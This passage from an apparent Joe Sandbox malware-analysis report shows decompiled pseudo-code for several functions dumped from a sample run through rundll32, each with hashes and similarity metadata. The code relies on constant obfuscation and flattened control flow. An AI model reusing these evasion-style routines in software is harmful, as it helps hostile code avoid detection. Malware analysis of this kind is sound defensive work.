                                                                                                                                    				_v572 = _v572 + 0xffffd1bc;
                                                                                                                                    				_t193 = 0x2e;
                                                                                                                                    				_v572 = _v572 * 0x26;
                                                                                                                                    				_v572 = _v572 ^ 0x12c53124;
                                                                                                                                    				_v588 = 0x8dc921;
                                                                                                                                    				_v588 = _v588 | 0x53df5653;
                                                                                                                                    				_v588 = _v588 << 7;
                                                                                                                                    				_v588 = _v588 * 0x73;
                                                                                                                                    				_v588 = _v588 ^ 0xc8beb34e;
                                                                                                                                    				_v544 = 0xe1fa74;
                                                                                                                                    				_v544 = _v544 + 0xffffe6ac;
                                                                                                                                    				_v544 = _v544 ^ 0x00e0f2b8;
                                                                                                                                    				_v568 = 0x925246;
                                                                                                                                    				_v568 = _v568 + 0xffffcd65;
                                                                                                                                    				_v568 = _v568 + 0xffffdee0;
                                                                                                                                    				_v568 = _v568 ^ 0x009eae97;
                                                                                                                                    				_v576 = 0x3c09b4;
                                                                                                                                    				_v576 = _v576 + 0xffff2c4c;
                                                                                                                                    				_v576 = _v576 >> 0xa;
                                                                                                                                    				_v576 = _v576 ^ 0x000cc2c3;
                                                                                                                                    				_v592 = 0xac7846;
                                                                                                                                    				_v592 = _v592 ^ 0xbb2572b9;
                                                                                                                                    				_v592 = _v592 ^ 0xeb3265e6;
                                                                                                                                    				_v592 = _v592 | 0x6a541c4b;
                                                                                                                                    				_v592 = _v592 ^ 0x7af30806;
                                                                                                                                    				_v548 = 0xb1a24a;
                                                                                                                                    				_v548 = _v548 / _t193;
                                                                                                                                    				_v548 = _v548 ^ 0x00094ccb;
                                                                                                                                    				_v552 = 0xbe5b93;
                                                                                                                                    				_v552 = _v552 | 0xe01e3375;
                                                                                                                                    				_v552 = _v552 ^ 0xe0b0d42a;
                                                                                                                                    				_v532 = 0x76dce5;
                                                                                                                                    				_t194 = 0x19;
                                                                                                                                    				_v532 = _v532 / _t194;
                                                                                                                                    				_v532 = _v532 ^ 0x00002403;
                                                                                                                                    				_v584 = 0xffb3b0;
                                                                                                                                    				_v584 = _v584 << 0xc;
                                                                                                                                    				_v584 = _v584 ^ 0x8b2427a7;
                                                                                                                                    				_v584 = _v584 | 0x0ff5fda2;
                                                                                                                                    				_v584 = _v584 ^ 0x7ffdbf2b;
                                                                                                                                    				_v580 = 0x6f9ecd;
                                                                                                                                    				_t195 = 0x5b;
                                                                                                                                    				_v580 = _v580 / _t195;
                                                                                                                                    				_v580 = _v580 << 0xc;
                                                                                                                                    				_v580 = _v580 ^ 0x13a22276;
                                                                                                                                    				_v540 = 0xd8d341;
                                                                                                                                    				_v540 = _v540 * 0xb;
                                                                                                                                    				_v540 = _v540 ^ 0x095c7847;
                                                                                                                                    				do {
                                                                                                                                    					while(_t164 != 0x2dc4ff7) {
                                                                                                                                    						if(_t164 == 0x5cfc1e4) {
                                                                                                                                    							return E002C9DCF(_v532, _v584, _v580,  &_v524,  &_v524, E002C4EE3, _v540, 0);
                                                                                                                                    						}
                                                                                                                                    						if(_t164 == 0x9efe9dd) {
                                                                                                                                    							_push(_v536);
                                                                                                                                    							_push(_v560);
                                                                                                                                    							_t161 = E002DDCF7(_v556, 0x2c1000, __eflags);
                                                                                                                                    							_t173 =  *0x2e3e10; // 0x0
                                                                                                                                    							_t188 =  *0x2e3e10; // 0x0
                                                                                                                                    							E002C47CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
                                                                                                                                    							_t158 = E002CA8B0(_v568, _t161, _v576);
                                                                                                                                    							_t198 = _t198 + 0x24;
                                                                                                                                    							_t164 = 0x2dc4ff7;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t164 != 0xafec1cc) {
                                                                                                                                    							goto L8;
                                                                                                                                    						}
                                                                                                                                    						_t164 = 0x9efe9dd;
                                                                                                                                    					}
                                                                                                                                    					_t158 = E002CB6CF( &_v524, _v592, _v548, _v552);
                                                                                                                                    					__eflags = 0;
                                                                                                                                    					 *_t158 = 0;
                                                                                                                                    					_t164 = 0x5cfc1e4;
                                                                                                                                    					L8:
                                                                                                                                    					__eflags = _t164 - 0xdc02af8;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				return _t158;
                                                                                                                                    			}
































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Gx\$e2
                                                                                                                                    • API String ID: 0-3912940318
                                                                                                                                    • Opcode ID: c798d3a62a33a197fb75ec36bdb3a0abba1fe6da41d56cecb7ce44d85fd48c6a
                                                                                                                                    • Instruction ID: 437e0ff6c7738cfe045fbe350b7b1067777a09cee69cb916f78c0f1097a1de47
                                                                                                                                    • Opcode Fuzzy Hash: c798d3a62a33a197fb75ec36bdb3a0abba1fe6da41d56cecb7ce44d85fd48c6a
                                                                                                                                    • Instruction Fuzzy Hash: 9C7152711183419FC768CF21D88A91FBBF1FBC4748F205A1DF29696260D3B18959CF86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002CA55F() {
                                                                                                                                    				char _v520;
                                                                                                                                    				signed int _v524;
                                                                                                                                    				signed int _v528;
                                                                                                                                    				intOrPtr _v532;
                                                                                                                                    				signed int _v536;
                                                                                                                                    				signed int _v540;
                                                                                                                                    				signed int _v544;
                                                                                                                                    				signed int _v548;
                                                                                                                                    				signed int _v552;
                                                                                                                                    				signed int _v556;
                                                                                                                                    				signed int _v560;
                                                                                                                                    				signed int _v564;
                                                                                                                                    				signed int _v568;
                                                                                                                                    				signed int _v572;
                                                                                                                                    				signed int _v576;
                                                                                                                                    				signed int _v580;
                                                                                                                                    				signed int _v584;
                                                                                                                                    				signed int _t161;
                                                                                                                                    				char* _t162;
                                                                                                                                    				intOrPtr _t164;
                                                                                                                                    				void* _t168;
                                                                                                                                    				signed int _t187;
                                                                                                                                    				signed int _t189;
                                                                                                                                    				signed int _t190;
                                                                                                                                    				signed int _t191;
                                                                                                                                    				signed int _t192;
                                                                                                                                    				short* _t195;
                                                                                                                                    				signed int* _t197;
                                                                                                                                    
                                                                                                                                    				_t197 =  &_v584;
                                                                                                                                    				_v528 = _v528 & 0x00000000;
                                                                                                                                    				_v524 = _v524 & 0x00000000;
                                                                                                                                    				_t168 = 0xe71c2f1;
                                                                                                                                    				_v532 = 0xa0346f;
                                                                                                                                    				_v560 = 0x45ed96;
                                                                                                                                    				_t187 = 0x29;
                                                                                                                                    				_v560 = _v560 / _t187;
                                                                                                                                    				_t189 = 0x5d;
                                                                                                                                    				_v560 = _v560 * 0x5e;
                                                                                                                                    				_v560 = _v560 ^ 0x00ac5e2c;
                                                                                                                                    				_v568 = 0x587b3f;
                                                                                                                                    				_v568 = _v568 >> 1;
                                                                                                                                    				_v568 = _v568 >> 6;
                                                                                                                                    				_v568 = _v568 + 0x3200;
                                                                                                                                    				_v568 = _v568 ^ 0x000d20ef;
                                                                                                                                    				_v540 = 0x1767bf;
                                                                                                                                    				_v540 = _v540 >> 0xa;
                                                                                                                                    				_v540 = _v540 ^ 0x00010300;
                                                                                                                                    				_v548 = 0xad8e3d;
                                                                                                                                    				_v548 = _v548 ^ 0x5762e507;
                                                                                                                                    				_v548 = _v548 ^ 0xbd28358e;
                                                                                                                                    				_v548 = _v548 ^ 0xeae8e106;
                                                                                                                                    				_v584 = 0xa1a61c;
                                                                                                                                    				_v584 = _v584 * 0x38;
                                                                                                                                    				_v584 = _v584 + 0xffff1963;
                                                                                                                                    				_v584 = _v584 | 0xaacebf86;
                                                                                                                                    				_v584 = _v584 ^ 0xabd4b38c;
                                                                                                                                    				_v556 = 0xa4c35b;
                                                                                                                                    				_v556 = _v556 / _t189;
                                                                                                                                    				_v556 = _v556 | 0xf6aeb391;
                                                                                                                                    				_v556 = _v556 ^ 0xf6ac7ee7;
                                                                                                                                    				_v536 = 0xf31b8a;
                                                                                                                                    				_v536 = _v536 | 0x87603e20;
                                                                                                                                    				_v536 = _v536 ^ 0x87f7aca9;
                                                                                                                                    				_v576 = 0x423791;
                                                                                                                                    				_v576 = _v576 + 0xffffb580;
                                                                                                                                    				_v576 = _v576 + 0x7a73;
                                                                                                                                    				_v576 = _v576 ^ 0x7a6e2c80;
                                                                                                                                    				_v576 = _v576 ^ 0x7a24ad4c;
                                                                                                                                    				_v544 = 0x7ccdad;
                                                                                                                                    				_v544 = _v544 << 7;
                                                                                                                                    				_v544 = _v544 ^ 0x3e66d3ae;
                                                                                                                                    				_v572 = 0x1eeccc;
                                                                                                                                    				_v572 = _v572 | 0x2c9b1d75;
                                                                                                                                    				_v572 = _v572 << 6;
                                                                                                                                    				_t190 = 0x5b;
                                                                                                                                    				_v572 = _v572 / _t190;
                                                                                                                                    				_v572 = _v572 ^ 0x007e2283;
                                                                                                                                    				_v552 = 0x119b6d;
                                                                                                                                    				_t191 = 0x5a;
                                                                                                                                    				_v552 = _v552 / _t191;
                                                                                                                                    				_v552 = _v552 ^ 0xceecc8a8;
                                                                                                                                    				_v552 = _v552 ^ 0xceebe4d8;
                                                                                                                                    				_v580 = 0x5ef79f;
                                                                                                                                    				_v580 = _v580 / _t187;
                                                                                                                                    				_v580 = _v580 | 0x8cf80c97;
                                                                                                                                    				_t192 = 0x3d;
                                                                                                                                    				_v580 = _v580 / _t192;
                                                                                                                                    				_v580 = _v580 ^ 0x02499ffb;
                                                                                                                                    				do {
                                                                                                                                    					while(_t168 != 0xc65bb2) {
                                                                                                                                    						if(_t168 == 0x63f282e) {
                                                                                                                                    							_t162 = E002DDA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
                                                                                                                                    							_t197 =  &(_t197[4]);
                                                                                                                                    							_t168 = 0xc65bb2;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t168 == 0xb3c9692) {
                                                                                                                                    							_t164 =  *0x2e3e10; // 0x0
                                                                                                                                    							__eflags = _t164 + 0x1c;
                                                                                                                                    							return E002C3BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
                                                                                                                                    						}
                                                                                                                                    						if(_t168 != 0xe71c2f1) {
                                                                                                                                    							goto L15;
                                                                                                                                    						}
                                                                                                                                    						_t168 = 0x63f282e;
                                                                                                                                    					}
                                                                                                                                    					_v564 = 0x8b8c25;
                                                                                                                                    					_v564 = _v564 * 0x78;
                                                                                                                                    					_v564 = _v564 + 0xffff9cfb;
                                                                                                                                    					_v564 = _v564 ^ 0x41694e51;
                                                                                                                                    					_t161 = E002CCB52(_v584,  &_v520, _v556, _v536, _v576);
                                                                                                                                    					_t197 =  &(_t197[3]);
                                                                                                                                    					_t195 =  &_v520 + _t161 * 2;
                                                                                                                                    					while(1) {
                                                                                                                                    						_t162 =  &_v520;
                                                                                                                                    						__eflags = _t195 - _t162;
                                                                                                                                    						if(_t195 <= _t162) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						__eflags =  *_t195 - 0x5c;
                                                                                                                                    						if( *_t195 != 0x5c) {
                                                                                                                                    							L10:
                                                                                                                                    							_t195 = _t195 - 2;
                                                                                                                                    							__eflags = _t195;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						_t139 =  &_v564;
                                                                                                                                    						 *_t139 = _v564 - 1;
                                                                                                                                    						__eflags =  *_t139;
                                                                                                                                    						if( *_t139 == 0) {
                                                                                                                                    							__eflags = _t195;
                                                                                                                                    							L14:
                                                                                                                                    							_t168 = 0xb3c9692;
                                                                                                                                    							goto L15;
                                                                                                                                    						}
                                                                                                                                    						goto L10;
                                                                                                                                    					}
                                                                                                                                    					goto L14;
                                                                                                                                    					L15:
                                                                                                                                    					__eflags = _t168 - 0x6143c47;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				return _t162;
                                                                                                                                    			}
































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: QNiA$sz
                                                                                                                                    • API String ID: 0-294658094
                                                                                                                                    • Opcode ID: 163305e1802cdf98d8f67ef249ae1b963b9d3aa36fd10c271da3f91973da46d2
                                                                                                                                    • Instruction ID: 2106e28e3ac421a31bd5a88afa22b5a7ddbf898635213dfa6f69cdd586b85d5e
                                                                                                                                    • Opcode Fuzzy Hash: 163305e1802cdf98d8f67ef249ae1b963b9d3aa36fd10c271da3f91973da46d2
                                                                                                                                    • Instruction Fuzzy Hash: 42716331519341ABC398CF26D98591FFBF1FBC4718F404A1DF58AA6260D3B48A198F83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002D0B19(void* __ecx) {
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				void* _t160;
                                                                                                                                    				void* _t164;
                                                                                                                                    				signed int _t166;
                                                                                                                                    				signed int _t167;
                                                                                                                                    				signed int _t168;
                                                                                                                                    				signed int _t169;
                                                                                                                                    				signed int _t170;
                                                                                                                                    				intOrPtr _t190;
                                                                                                                                    				intOrPtr* _t191;
                                                                                                                                    				intOrPtr* _t192;
                                                                                                                                    				signed int* _t194;
                                                                                                                                    
                                                                                                                                    				_t194 =  &_v68;
                                                                                                                                    				_v12 = 0xec215;
                                                                                                                                    				_v8 = 0x867af3;
                                                                                                                                    				_t190 =  *0x2e3208; // 0x0
                                                                                                                                    				_v4 = 0;
                                                                                                                                    				_t164 = __ecx;
                                                                                                                                    				_v64 = 0x2d9572;
                                                                                                                                    				_t191 = _t190 + 0x20c;
                                                                                                                                    				_v64 = _v64 + 0xffff7051;
                                                                                                                                    				_v64 = _v64 ^ 0xb4c09ebb;
                                                                                                                                    				_v64 = _v64 | 0x08f8e0e6;
                                                                                                                                    				_v64 = _v64 ^ 0xbcfdfbfe;
                                                                                                                                    				_v40 = 0xaf9231;
                                                                                                                                    				_v40 = _v40 + 0x3789;
                                                                                                                                    				_v40 = _v40 + 0x1acf;
                                                                                                                                    				_v40 = _v40 ^ 0x00adbfc0;
                                                                                                                                    				_v68 = 0xf5f340;
                                                                                                                                    				_v68 = _v68 ^ 0x3b0075db;
                                                                                                                                    				_v68 = _v68 >> 1;
                                                                                                                                    				_v68 = _v68 + 0xaae2;
                                                                                                                                    				_v68 = _v68 ^ 0x1dff90e5;
                                                                                                                                    				_v24 = 0xe1803e;
                                                                                                                                    				_v24 = _v24 + 0x946c;
                                                                                                                                    				_v24 = _v24 ^ 0x00ebebe2;
                                                                                                                                    				_v44 = 0xcb8087;
                                                                                                                                    				_t166 = 0x7f;
                                                                                                                                    				_v44 = _v44 / _t166;
                                                                                                                                    				_v44 = _v44 << 5;
                                                                                                                                    				_v44 = _v44 ^ 0x00394faa;
                                                                                                                                    				_v32 = 0x6e7c9c;
                                                                                                                                    				_v32 = _v32 << 0xf;
                                                                                                                                    				_v32 = _v32 >> 6;
                                                                                                                                    				_v32 = _v32 ^ 0x00f599ec;
                                                                                                                                    				_v36 = 0x8d7ece;
                                                                                                                                    				_v36 = _v36 + 0xd96f;
                                                                                                                                    				_v36 = _v36 + 0x3e8b;
                                                                                                                                    				_v36 = _v36 ^ 0x008d6b01;
                                                                                                                                    				_v60 = 0x740a18;
                                                                                                                                    				_v60 = _v60 + 0x5af6;
                                                                                                                                    				_t167 = 0x2d;
                                                                                                                                    				_v60 = _v60 / _t167;
                                                                                                                                    				_t168 = 0xc;
                                                                                                                                    				_v60 = _v60 / _t168;
                                                                                                                                    				_v60 = _v60 ^ 0x000f4a79;
                                                                                                                                    				_v48 = 0xecd979;
                                                                                                                                    				_v48 = _v48 + 0xffff2496;
                                                                                                                                    				_t169 = 3;
                                                                                                                                    				_v48 = _v48 / _t169;
                                                                                                                                    				_v48 = _v48 ^ 0xbc9c03a4;
                                                                                                                                    				_v48 = _v48 ^ 0xbcdb2390;
                                                                                                                                    				_v52 = 0x17ff93;
                                                                                                                                    				_v52 = _v52 << 0xd;
                                                                                                                                    				_v52 = _v52 + 0x3109;
                                                                                                                                    				_v52 = _v52 ^ 0x7590f195;
                                                                                                                                    				_v52 = _v52 ^ 0x8a641707;
                                                                                                                                    				_v20 = 0x28811b;
                                                                                                                                    				_v20 = _v20 * 0x25;
                                                                                                                                    				_v20 = _v20 ^ 0x05ddec85;
                                                                                                                                    				_v56 = 0x23ad29;
                                                                                                                                    				_t170 = 0x5a;
                                                                                                                                    				_v56 = _v56 / _t170;
                                                                                                                                    				_v56 = _v56 >> 8;
                                                                                                                                    				_v56 = _v56 ^ 0x06fabbcf;
                                                                                                                                    				_v56 = _v56 ^ 0x06fdb2ad;
                                                                                                                                    				_v28 = 0x8d9789;
                                                                                                                                    				_v28 = _v28 | 0x3813f7c3;
                                                                                                                                    				_v28 = _v28 + 0xa24c;
                                                                                                                                    				_v28 = _v28 ^ 0x38ab2d0e;
                                                                                                                                    				_v16 = 0x83a12;
                                                                                                                                    				_v16 = _v16 << 0xb;
                                                                                                                                    				_v16 = _v16 ^ 0x41de3db0;
                                                                                                                                    				while(1) {
                                                                                                                                    					_t192 =  *_t191;
                                                                                                                                    					if(_t192 == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
                                                                                                                                    						L4:
                                                                                                                                    						 *_t191 =  *_t192;
                                                                                                                                    						_t160 = E002D8519(_v28, _v16, _t192);
                                                                                                                                    					} else {
                                                                                                                                    						_t133 =  &_v40; // 0xebebe2
                                                                                                                                    						_t160 = E002C8DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
                                                                                                                                    						_t194 =  &(_t194[4]);
                                                                                                                                    						if(_t160 != _v64) {
                                                                                                                                    							_t191 = _t192;
                                                                                                                                    						} else {
                                                                                                                                    							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
                                                                                                                                    							E002D9E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
                                                                                                                                    							E002D1E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
                                                                                                                                    							_t194 =  &(_t194[5]);
                                                                                                                                    							goto L4;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t160;
                                                                                                                                    			}

































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 1$
                                                                                                                                    • API String ID: 0-209397207
                                                                                                                                    • Opcode ID: 53f76613a298a67dc4215c9c6cba5cd064306c0e0a31594934c5ac8062f00761
                                                                                                                                    • Instruction ID: 25ca407e728ac29cb6b112961ed4613027cd15039af28f4b64502a538aaaaf9b
                                                                                                                                    • Opcode Fuzzy Hash: 53f76613a298a67dc4215c9c6cba5cd064306c0e0a31594934c5ac8062f00761
                                                                                                                                    • Instruction Fuzzy Hash: 7B612FB25083419FC394CF21D48940BBBF2FBC9768F509A1EF19696260D7B1DA5ACF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002CAEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                                    				char _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				void* _t116;
                                                                                                                                    				void* _t130;
                                                                                                                                    				intOrPtr _t133;
                                                                                                                                    				void* _t137;
                                                                                                                                    				intOrPtr* _t154;
                                                                                                                                    				void* _t155;
                                                                                                                                    				signed int _t156;
                                                                                                                                    				signed int _t157;
                                                                                                                                    				signed int _t158;
                                                                                                                                    				signed int _t159;
                                                                                                                                    				void* _t161;
                                                                                                                                    				void* _t162;
                                                                                                                                    
                                                                                                                                    				_t135 = _a12;
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_t154 = __ecx;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t116);
                                                                                                                                    				_v44 = 0xe8605f;
                                                                                                                                    				_t162 = _t161 + 0x18;
                                                                                                                                    				_v44 = _v44 + 0x84a0;
                                                                                                                                    				_v44 = _v44 ^ 0x00e8e4ff;
                                                                                                                                    				_t155 = 0;
                                                                                                                                    				_v68 = 0xe00e28;
                                                                                                                                    				_t137 = 0xc99b7e9;
                                                                                                                                    				_v68 = _v68 << 9;
                                                                                                                                    				_v68 = _v68 << 2;
                                                                                                                                    				_t156 = 0x3b;
                                                                                                                                    				_v68 = _v68 / _t156;
                                                                                                                                    				_v68 = _v68 ^ 0x0001eb63;
                                                                                                                                    				_v76 = 0x5a4023;
                                                                                                                                    				_v76 = _v76 >> 0xf;
                                                                                                                                    				_t157 = 0x5b;
                                                                                                                                    				_v76 = _v76 * 0x13;
                                                                                                                                    				_v76 = _v76 ^ 0x64c481b8;
                                                                                                                                    				_v76 = _v76 ^ 0x64ccd277;
                                                                                                                                    				_v64 = 0xe36df4;
                                                                                                                                    				_v64 = _v64 / _t157;
                                                                                                                                    				_t158 = 9;
                                                                                                                                    				_v64 = _v64 * 0x52;
                                                                                                                                    				_v64 = _v64 ^ 0x00c8b522;
                                                                                                                                    				_v80 = 0x952e3b;
                                                                                                                                    				_v80 = _v80 >> 6;
                                                                                                                                    				_v80 = _v80 ^ 0xc023484e;
                                                                                                                                    				_v80 = _v80 / _t158;
                                                                                                                                    				_v80 = _v80 ^ 0x155df6ec;
                                                                                                                                    				_v72 = 0x4bfcfc;
                                                                                                                                    				_v72 = _v72 | 0x0a339af0;
                                                                                                                                    				_v72 = _v72 << 0xf;
                                                                                                                                    				_t159 = 0x12;
                                                                                                                                    				_v72 = _v72 / _t159;
                                                                                                                                    				_v72 = _v72 ^ 0x0e3e5ce5;
                                                                                                                                    				_v40 = 0xc0630c;
                                                                                                                                    				_v40 = _v40 | 0x5d0d844d;
                                                                                                                                    				_v40 = _v40 ^ 0x5dc4e99c;
                                                                                                                                    				_v52 = 0x98b7b;
                                                                                                                                    				_v52 = _v52 + 0xa105;
                                                                                                                                    				_v52 = _v52 >> 5;
                                                                                                                                    				_v52 = _v52 ^ 0x0004c78d;
                                                                                                                                    				_v56 = 0xd0814a;
                                                                                                                                    				_v56 = _v56 >> 9;
                                                                                                                                    				_v56 = _v56 * 0x3e;
                                                                                                                                    				_v56 = _v56 ^ 0x001a31dc;
                                                                                                                                    				_v60 = 0xb9e1cb;
                                                                                                                                    				_v60 = _v60 * 0x25;
                                                                                                                                    				_v60 = _v60 << 0xa;
                                                                                                                                    				_v60 = _v60 ^ 0x768204a8;
                                                                                                                                    				_v48 = 0xccd34a;
                                                                                                                                    				_v48 = _v48 + 0xffff20ce;
                                                                                                                                    				_v48 = _v48 ^ 0x00ce4dff;
                                                                                                                                    				do {
                                                                                                                                    					while(_t137 != 0x8f26e2d) {
                                                                                                                                    						if(_t137 == 0xc99b7e9) {
                                                                                                                                    							_t137 = 0x8f26e2d;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t137 != 0xfe1ef29) {
                                                                                                                                    								goto L10;
                                                                                                                                    							} else {
                                                                                                                                    								_t133 =  *0x2e3dfc; // 0x0
                                                                                                                                    								E002DE274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
                                                                                                                                    								_t155 =  ==  ? 1 : _t155;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L5:
                                                                                                                                    						return _t155;
                                                                                                                                    					}
                                                                                                                                    					_push( *_t154);
                                                                                                                                    					_t130 = E002DAE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
                                                                                                                                    					_t162 = _t162 + 0x14;
                                                                                                                                    					if(_t130 == 0) {
                                                                                                                                    						_t137 = 0xeaa5f76;
                                                                                                                                    						goto L10;
                                                                                                                                    					} else {
                                                                                                                                    						_t137 = 0xfe1ef29;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					goto L5;
                                                                                                                                    					L10:
                                                                                                                                    				} while (_t137 != 0xeaa5f76);
                                                                                                                                    				goto L5;
                                                                                                                                    			}


                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: #@Z$_`
                                                                                                                                    • API String ID: 0-2586238014
                                                                                                                                    • Opcode ID: dc12990c7b0bbce177bc8a674bcde518299997b4f0205c1736a791a1d458d691
                                                                                                                                    • Instruction ID: 266766b340b840c726be438e4a6ce3f27451e5e1a97463a6bfc091ea3dec1d1e
                                                                                                                                    • Opcode Fuzzy Hash: dc12990c7b0bbce177bc8a674bcde518299997b4f0205c1736a791a1d458d691
                                                                                                                                    • Instruction Fuzzy Hash: 825136725083409FC718CF62C88A81BBBE1FBD8758F549A1DF59696260C3B2CA59CF47
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002CDFF3() {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				intOrPtr _t128;
                                                                                                                                    				intOrPtr _t131;
                                                                                                                                    				signed int _t133;
                                                                                                                                    				signed int _t134;
                                                                                                                                    				intOrPtr _t135;
                                                                                                                                    				void* _t143;
                                                                                                                                    				void* _t146;
                                                                                                                                    				signed int* _t148;
                                                                                                                                    
                                                                                                                                    				_t148 =  &_v52;
                                                                                                                                    				_v12 = 0xa1a716;
                                                                                                                                    				_v12 = _v12 + 0x2188;
                                                                                                                                    				_v12 = _v12 ^ 0x00a02056;
                                                                                                                                    				_v32 = 0x472a3;
                                                                                                                                    				_v32 = _v32 + 0x22e5;
                                                                                                                                    				_v32 = _v32 ^ 0xff9fab52;
                                                                                                                                    				_v32 = _v32 ^ 0xff9c5b0a;
